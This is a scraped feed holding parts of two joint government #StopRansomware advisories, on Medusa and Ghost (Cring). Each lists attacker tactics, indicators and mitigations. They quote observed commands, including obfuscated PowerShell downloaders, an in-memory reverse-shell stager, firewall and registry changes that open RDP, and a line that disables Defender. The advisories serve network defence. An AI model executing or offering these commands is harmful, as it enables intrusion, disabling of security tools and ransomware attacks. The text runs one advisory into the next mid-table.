Medusa developers and affiliates—referred to as “Medusa actors” in this advisory—employ a double extortion model, where they encrypt victim data and threaten to publicly release exfiltrated data if a ransom is not paid.</p> <h3>Initial Access</h3> <p>Medusa developers typically recruit initial access brokers (IABs) in cybercriminal forums and marketplaces to obtain initial access [<a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a>] to potential victims. Potential payments between $100 USD and $1 million USD are offered to these affiliates with the opportunity to work exclusively for Medusa. Medusa IABs (affiliates) are known to make use of common techniques, such as:</p> <ul> <li><strong>Phishing campaigns</strong> as a primary method for stealing victim credentials&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a>].</li> <li><strong>Exploitation of unpatched software vulnerabilities [</strong><a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a><strong>]</strong> through Common Vulnerabilities and Exposures (CVEs) such as the ScreenConnect vulnerability&nbsp;<a href="https://www.cve.org/CVERecord?id=CVE-2024-1709" title="Authentication bypass using an alternate path or channel">CVE-2024-1709</a> [<a href="https://cwe.mitre.org/data/definitions/288.html" title="Authentication Bypass Using an Alternate Path or Channel">CWE-288: Authentication Bypass Using an Alternate Path or Channel</a>] and Fortinet EMS SQL injection vulnerability [<a href="https://www.cve.org/CVERecord?id=CVE-2023-48788" title="CVE-2023-48788">CVE-2023-48788</a> [<a href="https://cwe.mitre.org/data/definitions/89.html" title="Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE 89: SQL Injection</a>].</li> </ul> <h3>Discovery</h3> <p>Medusa actors use&nbsp;<a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living Off the Land Techniques">living off the land (LOTL)</a> and legitimate tools Advanced IP Scanner&nbsp;and SoftPerfect Network Scanner&nbsp;for initial user, system, and network enumeration.&nbsp;Once a foothold in a victim network is established, commonly scanned ports include:</p> <ul> <li><code>21</code> (FTP)</li> <li><code>22</code> (SSH)</li> <li><code>23</code> (Telnet)</li> <li><code>80</code> (HTTP)</li> <li><code>115</code> (SFTP)</li> <li><code>443</code> (HTTPS)</li> <li><code>1433</code> (SQL database)</li> <li><code>3050</code> (Firebird database)</li> <li><code>3128</code> (HTTP web proxy)</li> <li><code>3306</code> (MySQL database)</li> <li><code>3389</code> (RDP)</li> </ul> <p>Medusa actors primarily use PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] and the Windows Command Prompt (cmd.exe) [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] for network [<a href="https://attack.mitre.org/versions/v16/techniques/T1046/" title="Network Service Discovery">T1046</a>] and filesystem enumeration [<a href="https://attack.mitre.org/versions/v16/techniques/T1083/" title="File and Directory Discovery">T1083</a>] and to utilize Ingress Tool Transfer capabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>]. Medusa actors use Windows Management Instrumentation (WMI) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] for querying system information.</p> <h3>Defense Evasion</h3> <p>Medusa actors use LOTL to avoid detection [<a href="https://attack.mitre.org/versions/v16/tactics/TA0005/" title="Defense Evasion">TA0005</a>]. (See&nbsp;<strong>Appendix A</strong> for associated shell commands observed during FBI investigations of Medusa victims.) Certutil (<code>certutil.exe</code>) is used to avoid detection when performing file ingress.</p> <p>Actors have been observed using several different PowerShell detection evasion techniques with increasing complexity, which are provided below. Additionally, Medusa actors attempt to cover their tracks by deleting the PowerShell command line history [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a>].</p> <p>In this example, Medusa actors use a well-known evasion technique that executes a base64 encrypted command [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File">T1027.013</a>] using specific execution settings.</p> <ul> <li><code>powershell -exec bypass -enc &lt;base64 encrypted command string&gt;</code></li> </ul> <p>In another example, the&nbsp;DownloadFile string is obfuscated by slicing it into pieces and referencing it via a variable [<a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a>].</p> <ul> <li><code>powershell -nop -c $x = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$x.Invoke(http://&lt;ip&gt;/&lt;RAS tool&gt;.msi)</code></li> </ul> <p>In the final example, the payload is an obfuscated base64 string read into memory, decompressed from&nbsp;<code>gzip</code>, and used to create a&nbsp;<code>scriptblock</code>. The base64 payload is split using empty strings and concatenation, and uses a format operator (<code>-f</code>) followed by three arguments to specify character replacements in the base64 payload.</p> <ul> <li><code>powershell -nop -w hidden -noni -ep bypass &amp;([scriptblock]::create((</code></li> <li><code>New-Object System.IO.StreamReader(</code></li> <li><code>New-Object System.IO.Compression.GzipStream((</code></li> <li><code>New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(</code></li> <li><code>(('&lt;base64 payload string&gt;')-f'&lt;character replacement 0&gt;','&lt;character replacement 1&gt;', '&lt;character replacement 2&gt;')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))</code></li> </ul> <p>The obfuscated base64 PowerShell payload is identical to <code>powerfun.ps1</code>, a publicly available stager script that can create either a reverse or bind shell over TLS to load additional modules. In the bind shell, the script awaits a connection on local port <code>443</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>], and initiates a connection to a remote port <code>443</code> in the reverse shell.</p> <p>In some instances, Medusa actors attempted to use vulnerable or signed drivers to kill or delete endpoint detection and response (EDR) tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p> <p>FBI has observed Medusa actors using the following tools to support command and control (C2) and evade detection:</p> <ul> <li>Ligolo. <ul> <li>A reverse tunneling tool often used to create secure connections between a compromised host and threat actor’s machine.</li> </ul> </li> <li>Cloudflared. <ul> <li>Formerly known as ArgoTunnel.</li> <li>Used to securely expose applications, services, or servers to the internet via Cloudflare Tunnel without exposing them directly.</li> </ul> </li> </ul> <h3>Lateral Movement and Execution</h3> <p>Medusa actors use a variety of legitimate remote access software [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>]; they may tailor their choice based on any remote access tools already present in the victim environment as a means of evading detection. Investigations identified Medusa actors using remote access software AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop. Medusa uses these tools—in combination with Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v16/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>] and PsExec [<a href="https://attack.mitre.org/versions/v16/techniques/T1569/002/" title="System Services: Service Execution">T1569.002</a>]—to move laterally [<a href="https://attack.mitre.org/versions/v16/tactics/TA0008/" title="Lateral Movement">TA0008</a>] through the network and identify files for exfiltration [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>] and encryption [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. When provided with valid username and password credentials, Medusa actors use PsExec to:</p> <ul> <li>Copy (<code>-c</code>) one script from various batch scripts on the current machine to the remote machine and execute it with <code>SYSTEM</code> level privileges (<code>-s</code>).</li> <li>Execute an already existing local file on a remote machine with <code>SYSTEM</code> level privileges.</li> <li>Execute remote shell commands using <code>cmd /c</code>.</li> </ul> <p>One of the batch scripts executed by PsExec is <code>openrdp.bat</code>, which first creates a new firewall rule to allow inbound TCP traffic on port <code>3389</code>:</p> <ul> <li><code>netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow</code></li> </ul> <p>Then, a rule to allow remote WMI connections is created:</p> <ul> <li><code>netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes</code></li> </ul> <p>Finally, the registry is modified to allow Remote Desktop connections:</p> <ul> <li><code>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</code></li> </ul> <p><a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> has also been observed in use for Local Security Authority Subsystem Service (LSASS) dumping [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>] to harvest credentials [<a href="https://attack.mitre.org/tactics/TA0006/" title="Credential Access">TA0006</a>] and aid lateral movement.</p> <h3>Exfiltration and Encryption</h3> <p>Medusa actors install and use <a href="https://attack.mitre.org/versions/v16/software/S1040/" title="Rclone">Rclone</a> to facilitate exfiltration of data to the Medusa C2 servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] used by actors and affiliates. The actors use Sysinternals PsExec, PDQ Deploy, or BigFix [<a href="https://attack.mitre.org/versions/v16/techniques/T1072/" title="Software Deployment Tools">T1072</a>] to deploy the encryptor, <code>gaze.exe</code>, on files across the network—with the actors disabling Windows Defender and other antivirus services on specific targets. Encrypted files have a <code>.medusa</code> file extension. The process <code>gaze.exe</code> terminates all services [<a href="https://attack.mitre.org/versions/v16/techniques/T1489/" title="Service Stop">T1489</a>] related to backups, security, databases, communication, file sharing and websites, then deletes shadow copies [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>] and encrypts files with AES-256 before dropping the ransom note. The actors then manually turn off [<a href="https://attack.mitre.org/versions/v16/techniques/T1529/" title="System Shutdown/Reboot">T1529</a>] and encrypt virtual machines and delete their previously installed tools [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a>].</p> <h3>Extortion</h3> <p>Medusa RaaS employs a double extortion model, where victims must pay [<a href="https://attack.mitre.org/versions/v16/techniques/T1657/" title="Financial Theft">T1657</a>] to decrypt files and prevent further release. The ransom note demands victims make contact within 48 hours via either a Tor browser based live chat, or via Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond to the ransom note, Medusa actors will reach out to them directly by phone or email. Medusa operates a&nbsp;<code>.onion</code> data leak site, divulging victims alongside countdowns to the release of information. Ransom demands are posted on the site, with direct hyperlinks to Medusa affiliated cryptocurrency wallets. At this stage, Medusa concurrently advertises sale of the data to interested parties before the countdown timer ends. Victims can additionally pay $10,000 USD in cryptocurrency to add a day to the countdown timer.</p> <p>FBI investigations identified that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the “true decryptor”— potentially indicating a triple extortion scheme.</p> <h2><strong>Indicators of Compromise</strong></h2> <p><strong>Table 1</strong> lists the hashes of malicious files obtained during investigations.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 1: Malicious Files</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Files</th> <th role="columnheader">Hash (MD5)</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>!!!READ_ME_MEDUSA!!!.txt</td> <td>Redacted</td> <td>Ransom note file</td> </tr> <tr> <td>openrdp.bat</td> <td>44370f5c977e415981febf7dbb87a85c</td> <td>Allows incoming RDP and remote WMI connections</td> </tr> <tr> <td>pu.exe</td> <td>80d852cd199ac923205b61658a9ec5bc</td> <td>Reverse shell</td> </tr> </tbody> </table> <p><strong>Table 2</strong> includes email addresses used by Medusa actors to extort victims; they are exclusively used for ransom negotiation and contacting victims following compromise. These email addresses are not associated with phishing activity conducted by Medusa actors.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: Medusa Email Addresses</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Email Addresses</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>key.medusa.serviceteam@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>medusa.support@onionmail.org</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>mds.svt.breach@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>mds.svt.mir2@protonmail.com</td> <td>Used for ransom negotiation</td> </tr> <tr> <td>MedusaSupport@cock.li</td> <td>Used for ransom negotiation</td> </tr> </tbody> </table> <h2><strong>MITRE ATT&amp;CK Tactics and Techniques</strong></h2> <p>See <strong>Table 3</strong> – <strong>Table 11</strong>&nbsp;for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK® Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Initial Access</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Technique Title</th> <th role="columnheader">ID</th> <th role="columnheader">Use</th> </tr> </thead> <tbody> <tr> <td>Exploit Public-Facing Application</td> <td><a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td> <td>Medusa actors exploited unpatched software or n-day vulnerabilities through common vulnerabilities and exposures.</td> </tr> <tr> <td>Initial Access</td> <td><a href="https://attack.mitre.org/versions/v16/tactics/TA0001/" title="Initial Access">TA0001</a></td> <td>Medusa actors recruited initial access brokers (IABS) in cybercriminal forums and marketplaces to obtain initial access.</td> </tr> <tr> <td>Phishing</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1566/" title="Phishing">T1566</a></td> <td>Medusa IABS used phishing campaigns as a primary method for delivering ransomware to victims.</td> </tr> </tbody> </table> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;4: Defense Evasion</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Technique Title</th> <th role="columnheader">ID</th> <th role="columnheader">Use</th> </tr> </thead> <tbody> <tr> <td>Indicator Removal: Clear Command History</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/003/" title="Indicator Removal: Clear Command History">T1070.003</a></td> <td>Medusa actors attempt to cover their tracks by deleting the PowerShell command line history.</td> </tr> <tr> <td>Obfuscated Files or Information: Encrypted/Encoded File</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/013/" title="Obfuscated Files or Information: Encrypted/Encoded File ">T1027.013</a></td> <td>Medusa actors use a well-known evasion technique that executes a base64 encrypted command.</td> </tr> <tr> <td>Obfuscated Files or Information</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1027/" title="Obfuscated Files or Information">T1027</a></td> <td>Medusa actors obfuscated a string by slicing it into pieces and referencing it via a variable.</td> </tr> <tr> <td>Indicator Removal</td> <td><a href="https://attack.mitre.org/versions/v16/techniques/T1070/" title="Indicator Removal">T1070</a></td> <td>Medusa actors deleted their previous work and tools installed.&nbsp;</td> </tr> <t #StopRansomware: Ghost (Cring) Ransomware https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a US-CERT Alerts urn:uuid:9acf1d45-4155-38e9-38a6-5b158026af4b Wed, 19 Feb 2025 16:38:21 +0000 <h2><strong>Summary</strong></h2> <p><em><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit&nbsp;</em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p> <p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint advisory to disseminate known Ghost (Cring)—(“Ghost”)—ransomware IOCs and TTPs identified through FBI investigation as recently as January 2025.</p> <p>Beginning early 2021, Ghost actors began attacking victims whose internet facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.</p> <p>Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are: Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.</p> <p>Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet facing servers. Ghost actors exploit well known vulnerabilities and target networks where available patches have not been applied.</p> <p>The FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the <strong>Mitigations</strong> section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf" class="c-file__link" target="_blank">AA25-050A #StopRansomware: Ghost (Cring) Ransomware</a> <span class="c-file__size">(PDF, 735.18 KB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A.stix_.xml" class="c-file__link" target="_blank">AA25-050A STIX XML</a> <span class="c-file__size">(XML, 78.67 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A-%23StopRansomware-Ghost-%28Cring%29-Ransomware.stix_.xml" class="c-file__link" target="_blank">AA25-050A STIX XML (Additional IOCs)</a> <span class="c-file__size">(XML, 74.01 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2025-02/AA25-050A-%23StopRansomware-Ghost-%28Cring%29-Ransomware.stix_.json" class="c-file__link" target="_blank">AA25-050A STIX JSON</a> <span class="c-file__size">(JSON, 68.47 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the&nbsp;<a href="https://attack.mitre.org/versions/v16/" title="MITRE ATT&amp;CK® Matrix for Enterprise">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16.1. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Initial Access</h3> <p>The FBI has observed Ghost actors obtaining initial access to networks by exploiting public facing applications that are associated with multiple CVEs [<a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>]. Their methodology includes leveraging vulnerabilities in Fortinet FortiOS appliances (<a href="https://nvd.nist.gov/vuln/detail/CVE-2018-13379" title="CVE-2018-13379">CVE-2018-13379</a>), servers running Adobe ColdFusion (<a href="https://nvd.nist.gov/vuln/detail/CVE-2010-2861" title="CVE-2010-2861">CVE-2010-2861</a> and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2009-3960" title="CVE-2009-3960">CVE-2009-3960</a>), Microsoft SharePoint (<a href="https://nvd.nist.gov/vuln/detail/CVE-2019-0604" title="CVE-2019-0604">CVE-2019-0604</a>), and Microsoft Exchange (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34473" title="CVE-2021-34473">CVE-2021-34473</a>,&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-34523" title="CVE-2021-34523">CVE-2021-34523</a>, and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-31207" title="CVE-2021-31207">CVE-2021-31207</a>— commonly referred to as the ProxyShell attack chain).</p> <h3>Execution</h3> <p>Ghost actors have been observed uploading a web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>] to a compromised server and leveraging Windows Command Prompt [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>] and/or PowerShell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>] to download and execute&nbsp;<a href="https://attack.mitre.org/software/S0154/" title="Cobalt Strike">Cobalt Strike</a> Beacon malware [<a href="https://attack.mitre.org/versions/v16/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>] that is then implanted on victim systems. Despite Ghost actors’ malicious implementation, Cobalt Strike is a commercially available adversary simulation tool often used for the purposes of testing an organization’s security controls.</p> <h3>Persistence</h3> <p>Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day. However, Ghost actors sporadically create new local [<a href="https://attack.mitre.org/versions/v16/techniques/T1136/001/" title="Create Account: Local Account">T1136.001</a>] and domain accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>] and change passwords for existing accounts [<a href="https://attack.mitre.org/versions/v16/techniques/T1098/" title="Account Manipulation">T1098</a>]. In 2024, Ghost actors were observed deploying web shells [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>] on victim web servers.</p> <h3>Privilege Escalation</h3> <p>Ghost actors often rely on built in Cobalt Strike functions to steal process tokens running under the&nbsp;SYSTEM user context to impersonate the&nbsp;SYSTEM user, often for the purpose of running Beacon a second time with elevated privileges [<a href="https://attack.mitre.org/versions/v16/techniques/T1134/001/" title="Access Token Manipulation: Token Impersonation/Theft">T1134.001</a>].</p> <p>Ghost actors have been observed using multiple open-source tools in an attempt at privilege escalation through exploitation [<a href="https://attack.mitre.org/versions/v16/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>]&nbsp;such as “<a href="https://github.com/leitosama/SharpZeroLogon" title="SharpZeroLogon">SharpZeroLogon</a>,” “SharpGPPPass,” “<a href="https://github.com/BeichenDream/BadPotato" title="BadPotato">BadPotato</a>,” and “<a href="https://github.com/BeichenDream/GodPotato" title="GodPotato">GodPotato</a>.” These privilege escalation tools would not generally be used by individuals with legitimate access and credentials.&nbsp;</p> <p>See&nbsp;<strong>Table 1</strong> for a descriptive listing of tools.</p> <h3>Credential Access</h3> <p>Ghost actors use the built in Cobalt Strike function “hashdump” or&nbsp;<a href="https://attack.mitre.org/versions/v16/software/S0002/" title="Mimikatz">Mimikatz</a> [<a href="https://attack.mitre.org/versions/v16/techniques/T1003/" title="OS Credential Dumping">T1003</a>] to collect passwords and/or password hashes to aid them with unauthorized logins and privilege escalation or to pivot to other victim devices.</p> <h3>Defense Evasion</h3> <p>Ghost actors used their access through Cobalt Strike to display a list of running processes [<a href="https://attack.mitre.org/versions/v16/techniques/T1057/" title="Process Discovery">T1057</a>] to determine which antivirus software [<a href="https://attack.mitre.org/versions/v16/techniques/T1518/001/" title="Software Discovery: Security Software Discovery">T1518.001</a>] is running so that it can be disabled [<a href="https://attack.mitre.org/versions/v16/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>]. Ghost frequently runs a command to disable Windows Defender on network connected devices. Options used in this command are:&nbsp;Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.</p> <h3>Discovery</h3> <p>Ghost actors have been observed using other built-in Cobalt Strike commands for domain account discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1087/002/" title="Account Discovery: Domain Account">T1087.002</a>], open-source tools such as “<a href="https://github.com/mitchmoser/SharpShares" title="SharpShares">SharpShares</a>” for network share discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1135/" title="Network Share Discovery">T1135</a>], and “<a href="https://github.com/k8gege/Ladon">Ladon 911</a>” and “<a href="https://github.com/BronzeTicket/SharpNBTScan" title="SharpNBTScan">SharpNBTScan</a>” for remote systems discovery [<a href="https://attack.mitre.org/versions/v16/techniques/T1018/" title="Remote System Discovery">T1018</a>]. Network administrators would be unlikely to use these tools for network share or remote systems discovery.</p> <h3>Lateral Movement</h3> <p>Ghost actors used elevated access and Windows Management Instrumentation Command-Line (WMIC) [<a href="https://attack.mitre.org/versions/v16/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] to run PowerShell commands on additional systems on the victim network— often for the purpose of initiating additional Cobalt Strike Beacon infections. The associated encoded string is a base 64 PowerShell command that always begins with:&nbsp;powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA…&nbsp;[<a href="https://attack.mitre.org/versions/v16/techniques/T1132/001/" title="Data Encoding: Standard Encoding">T1132.001</a>][<a href="https://attack.mitre.org/versions/v16/techniques/T1564/003/" title="Hide Artifacts: Hidden Window">T1564.003</a>].</p> <p>This string decodes to “$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“” and is involved with the execution of Cobalt Strike in memory on the target machine.</p> <p><strong>In cases where lateral movement attempts are unsuccessful, Ghost actors have been observed abandoning an attack on a victim.</strong></p> <h3>Exfiltration</h3> <p>Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid. However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked.&nbsp;The FBI has observed limited downloading of data to Cobalt Strike Team Servers [<a href="https://attack.mitre.org/versions/v16/techniques/T1041/" title="Exfiltration Over C2 Channel">T1041</a>]. Victims and other trusted third parties have reported limited uses of&nbsp;Mega.nz [<a href="https://attack.mitre.org/versions/v16/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] and installed web shells for similar limited data exfiltration.&nbsp;<strong>Note:</strong> The typical data exfiltration is less than hundreds of gigabytes of data.</p> <h3>Command and Control</h3> <p>Ghost actors rely heavily on Cobalt Strike Beacon malware and Cobalt Strike Team Servers for command and control (C2) operations, which function using hypertext transfer protocol (HTTP) and hypertext transfer protocol secure (HTTPS) [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. Ghost rarely registers domains associated with their C2 servers. Instead, connections made to a uniform resource identifier (URI) of a C2 server, for the purpose of downloading and executing Beacon malware, directly reference the C2 server’s IP address. For example,&nbsp;http://xxx.xxx.xxx.xxx:80/Google.com where&nbsp;xxx.xxx.xxx.xxx<em>&nbsp;</em>represents the C2 server’s IP address.</p> <p>For email communication with victims, Ghost actors use legitimate email services that include traffic encryption features. [<a href="https://attack.mitre.org/versions/v16/techniques/T1573/" title="Encrypted Channel">T1573</a>] Some examples of emails services that Ghost actors have been observed using are Tutanota, Skiff, ProtonMail, Onionmail, and Mailfence.</p> <p><strong>Note:</strong>&nbsp;<strong>Table 2</strong> contains a list of Ghost ransom email addresses.</p> <h3>Impact and Encryption</h3> <p>Ghost actors use&nbsp;Cring.exe, Ghost.exe,&nbsp;ElysiumO.exe, and Locker.exe, which are all ransomware executables that share similar functionality. Ghost variants can be used to encrypt specific directories or the entire system’s storage [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. The nature of executables’ operability is based on command line arguments used when executing the ransomware file. Various file extensions and system folders are excluded during the encryption process to avoid encrypting files that would render targeted devices inoperable.</p> <p>These ransomware payloads clear Windows Event Logs [<a href="https://attack.mitre.org/versions/v16/techniques/T1070/001/" title="Indicator Removal: Clear Windows Event Logs">T1070.001</a>], disable the Volume Shadow Copy Service, and delete shadow copies to inhibit system recovery attempts [<a href="https://attack.mitre.org/versions/v16/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]. Data encrypted with Ghost ransomware variants cannot be recovered without the decryption key. Ghost actors hold the encrypted data for ransom and typically demand anywhere from tens to hundreds of thousands of dollars in cryptocurrency in exchange for decryption software [<a href="https://attack.mitre.org/versions/v16/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>].</p> <p>The impact of Ghost ransomware activity varies widely on a victim-to-victim basis. Ghost actors tend to move to other targets when confronted with hardened systems, such as those where proper network segmentation prevents lateral moment to other devices.</p> <h2><strong>Indicators of Compromise (IOC)</strong></h2> <p><strong>Table 1</strong> lists several tools and applications Ghost actors have used for their operations. The use of these tools and applications on a network should be investigated further.</p> <p><strong>Note:</strong> Authors of these tools generally state that they should not be used in illegal activity.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;1: Tools Leveraged by Ghost Actors</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Name</th> <th role="columnheader">Description</th> <th role="columnheader">Source</th> </tr> </thead> <tbody> <tr> 